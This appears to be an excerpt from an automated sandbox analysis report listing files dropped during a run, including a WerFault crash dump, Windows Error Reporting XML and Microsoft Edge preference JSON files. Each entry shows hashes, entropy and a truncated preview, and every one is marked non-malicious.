                                                                                                                                                      SHA-512:0B44A312EFDBC3A1E22225E1D8FDE424BABA5459B3593AE35A426F52DB527B33633B2396304B91D2AEA0CB9B35184561D9D337D9EE6B27E8AF2AA3CF2BD88A24
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MDMP..a..... ........RPg........................................2!..........T.......8...........T......................................................................................................................eJ..............Lw......................T....... ....RPg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8622
                                                                                                                                                      Entropy (8bit):3.694373556691079
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJBKVE3t66YpdadGgmfr57v/upDx89bNupfrPvm:R6lXJc56YDadGgmfrFvVNAf6
                                                                                                                                                      MD5:E9A8650E842D2EF8EB03E505C4705F0F
                                                                                                                                                      SHA1:7FAD75EFE8885B87998462B0081730739E3D15DB
                                                                                                                                                      SHA-256:28B232F3FEC99C35A80692E7CA5C92942383263E4C4D1C38E074E18881CB2AF7
                                                                                                                                                      SHA-512:4FD24EDBBEF9CB4C0DEDAD8C31C5CC459B75534578A11AD4F45EF468D1B816073ABE7A5F68CFDC49B3C13D4B74BB4BC00D99D2D36B9C1406815DE2E427EB5890
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.3.2.<./.P.i.
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4853
                                                                                                                                                      Entropy (8bit):4.449716485876646
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zsZ9Jg771I97QWpW8VYmYm8M4Jk5LvM6Fgjyq8vU5LvMwaMuFFd:uIjfxI7Ap7VKJcjMJWsjMw1u/d
                                                                                                                                                      MD5:99C44B0C489B978AA9E8169AA310ED2B
                                                                                                                                                      SHA1:DF20007B9EC8F84F12FA3C13E0F68D9C367AFDEF
                                                                                                                                                      SHA-256:40FBE49F91F94F2C455FF4AA562B152D60BDC6C8AA01AB2B09B2E33820D88C03
                                                                                                                                                      SHA-512:4AAFFA874E92E361C51985CF8C8D91A7D83D1DA99C45163BF54BE8ED29252087791E849A29909F3AEEA9415D0329E3BCBBB17769F688D8269A674B90C0F1B2BF
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="616561" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25130
                                                                                                                                                      Entropy (8bit):6.030838818334135
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:2tMkaMJH2m8qVT8IeQ0I5t0b9MEFzsNwhiqKKjPAiEpEV9SLTW:6MkbJrT8IeQc5z1fPjPAiEpSSLC
                                                                                                                                                      MD5:A826F21FD50A3498CD644EFD33FD3E3F
                                                                                                                                                      SHA1:2FF574C80FB896D2F34AFC561D9294F9519E2994
                                                                                                                                                      SHA-256:8D03FFD72334E294E66A45BE600716C131529F7B931BF3A6B3ECD41F0A571D38
                                                                                                                                                      SHA-512:FFC5984C802DCE12ACAC75FFE26F91D7F35F40635FA956DF412BBC2602DAB9AE8E9E0FC884EF53894F597E65EFED4215ABFBFFFDF9CEB6FBC2E178985F7FA85F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377790692304850","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733317097"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):25181
                                                                                                                                                      Entropy (8bit):6.030047251115912
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:2tMkaMJH2m8qVT8IeQ0I5t0b9MEFzsNnhiqKKjUAiEpEV9SLTW:6MkbJrT8IeQc5zkfPjUAiEpSSLC
                                                                                                                                                      MD5:0A46EB5ECA968E5AEF8FE49578D855C2
                                                                                                                                                      SHA1:9EF4601174334784C3A68ED32613C4F22F5616BA
                                                                                                                                                      SHA-256:6982A0A080E0F841006DB54CC938F01CB09A1D6C616E9091408368DCCD7AC408
                                                                                                                                                      SHA-512:B02B10B3402BDB0EB5EB5568E16D9A63ADAEBE9B022C47C1B6975150F73A5F37FC182DCACF514AD51E0E4BFF8D6E355B60A0D77F7E95E178BC305E1DD4FE3832
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377790692304850","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733317097"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):5.794417921959281
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:iaqkHfZG+rZHl55ih/cI9URLl8RotoqeMFVvlwhPOe4IbONIeTC6XQS0qGqk+Z4F:akxtlGeiRUUhW6qRAq1k8SPxVLZ7VTiq
                                                                                                                                                      MD5:312A3010E4B3D6723249E2B6A878E4B6
                                                                                                                                                      SHA1:B12E1547AF9C2505BEA93D540C2A1639C2328008
                                                                                                                                                      SHA-256:80530A526B5C03A6F76360DB965B2202BAE703A1455545DB139540E7001D167F
                                                                                                                                                      SHA-512:D1E1954BED64544D9A604A4C2E36180758C154606746EAE26F95EB7A6737FC40CA6F4701682B64D7F38530754F5BDE8C297AA4BE27C5247A4326F399E96B5347
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAACHEWIjkGPoS5OyQh029rRHEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAAc7Mn1ZHfcgpSse/Qwf77XU3XYwpT21SooayNwJhe0WQAAAAA
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8325
                                                                                                                                                      Entropy (8bit):5.791459135427024
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:fsNwxtlueiRU2fjGwkiu6qRAq1k8SPxVLZ7VTiQ:fsNwSbrAiu6q3QxVNZTiQ
                                                                                                                                                      MD5:00BBF0DE1F1A44570E34195D19136F70
                                                                                                                                                      SHA1:B7696B6154C186A35294950BFF78CF3D1697616C
                                                                                                                                                      SHA-256:5D512F1611DEF7D4F5B62580F191857E403BB56A4AEDE74F9AD1C44818772B8B
                                                                                                                                                      SHA-512:FDD8926AC8E8CB8DEB6DE79208297F5B7DF93C11F83A8939F3DDFAAC994124B8E4A574109CEAA7328C259C1074EA2B70712D1B36DA9155278AA1EB055F5C773E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):22929
                                                                                                                                                      Entropy (8bit):6.046088616796778
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:2tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhiqbLiEpEV9SLTW:6MkbJrT8IeQc5d1fbLiEpSSLa
                                                                                                                                                      MD5:3BD9F62D55047947F2F7959B19D352A0
                                                                                                                                                      SHA1:3857E593062FB9A6AA3B81D128529ACE76DC7B5B
                                                                                                                                                      SHA-256:CEE9F3585D7D6F79D37E862D397E40F75F1AB0B6CDF3604FDFA8F42C1FE76F19
                                                                                                                                                      SHA-512:905C603350B6719CC7505A04737198513840B81EA413B6DEA7ADAA312E457EB672CFD23521706BD4D41C7E31B0B36A57E523A8E316B1CF314B534359C0D86E9A
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377790692304850","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733317097"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):8243
                                                                                                                                                      Entropy (8bit):5.797550119035895
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:fsNAxtlueiRUXfjGwkiu6qRAq1k8SPxVLZ7VTiQ:fsNASwrAiu6q3QxVNZTiQ
                                                                                                                                                      MD5:7F5EA82BF8C80858CA3B2F9F65D92F20
                                                                                                                                                      SHA1:2789F0331928200FE03FBD6FC5121FD4F5AD2F8A
                                                                                                                                                      SHA-256:73D29EC441E59CE0A4156A1C5C79C0C7CF22134E57A788492496B14466DE5211
                                                                                                                                                      SHA-512:ED333C24F5013630ABB4D8D24AD08D76EFF1FC8CD349B414ACE9E927C8EC107449EBDDA0AD7B8ED7DA0010A9FE40B198C8C1D5987B134522FF7353911B910DB6
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):25130
                                                                                                                                                      Entropy (8bit):6.030846996787746
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:2tMkaMJH2m8qVT8IeQ0I5t0b9MEFzsNwhiqKKjUAiEpEV9SLTW:6MkbJrT8IeQc5z1fPjUAiEpSSLC
                                                                                                                                                      MD5:895BEE67AFB66DC2E62153ED3741773E
                                                                                                                                                      SHA1:556A04B9FC94EE2AD69750169D8DB044F04481DB
                                                                                                                                                      SHA-256:70B64F0A4D9C34DD7016753AE71B165CF6B0AFEFD1BA08C445DC5BC54C4CEB9D
                                                                                                                                                      SHA-512:4938BCF600CC285E3ED16694C705152E81803A50BFCD5A7BB3DC5D92ECDC7693A95828781CE5DE16C4ECC83E343A7A48EB2407F5F70F5D12378BCB4C58394E3E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377790692304850","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733317097"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):24028
                                                                                                                                                      Entropy (8bit):6.048570105339913
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:2tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhiq27Ai2NpEV9SLTW:6MkbJrT8IeQc5d1f27Ai2NpSSLa
                                                                                                                                                      MD5:245959095135DB3CAA5EE7807A79E3FB
                                                                                                                                                      SHA1:98B049784406AC79AD96C6BE8FB6477CBDD109AB
                                                                                                                                                      SHA-256:E16DEEF89F2A31BDBD9159B3BAE76D54B044F81F29F9AF0724421382D6C0EDD8
                                                                                                                                                      SHA-512:C22C0B3CF679E187FDAFC1D143F6CAFD7BE8E1BCD475403CCAB31A770A1AF99514ABE0C0B0080474649B296BD93DBD381D0A530DBFC4B808BE57523BB0ECBE8F
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377790692304850","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733317097"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):24028
                                                                                                                                                      Entropy (8bit):6.048530503769598
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:2tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhiq2Zii2NpEV9SLTW:6MkbJrT8IeQc5d1f2Zii2NpSSLa
                                                                                                                                                      MD5:9D67BF67C1876AA2A9529C99804D445A
                                                                                                                                                      SHA1:E3E80FEE7B1F6601592F9A674AEA671B79E257C0
                                                                                                                                                      SHA-256:E759624F1C2A14F6456FA03606B78C4FE53F93C76652394F720697ACD4EC5B66
                                                                                                                                                      SHA-512:88A7EBEBA5CE99C5497D01130DB247A10D4947456A3B7B64703B779EB2327CE019E3F4A320691F00BA609E9CC158492790D04286606AD4ADF133FE528E4323FD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377790692304850","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1733317097"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):8094
                                                                                                                                                      Entropy (8bit):5.804599270450843
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:asNAxtlueiRUvqQikiA6qRAq1k8SPxVLZ7VTiq:asNASCzhiA6q3QxVNZTiq
                                                                                                                                                      MD5:639E797F49A98A3760C905606E328EB3
                                                                                                                                                      SHA1:7ACDE73F9C854BA13153CA0BF8AEEC828A4270BA
                                                                                                                                                      SHA-256:7803E363E85CE4A55D2E7C34FA384B9A319439A3D0E3B97DAA6C45AF22D91393
                                                                                                                                                      SHA-512:82AE543B82B96848018ABA0FCCC2492BD94E1BAF238BD8E908FB2140685F0C1D215E3A53B2E5EABC9DE92062719A62C4EA063A8027E32E5CAB4CB002CE0AAC1E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_mig
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      File Type:JSON data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):107893
                                                                                                                                                      Entropy (8bit):4.6401415786958475
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                      MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                      SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                      SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                      SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                      Malicious:false
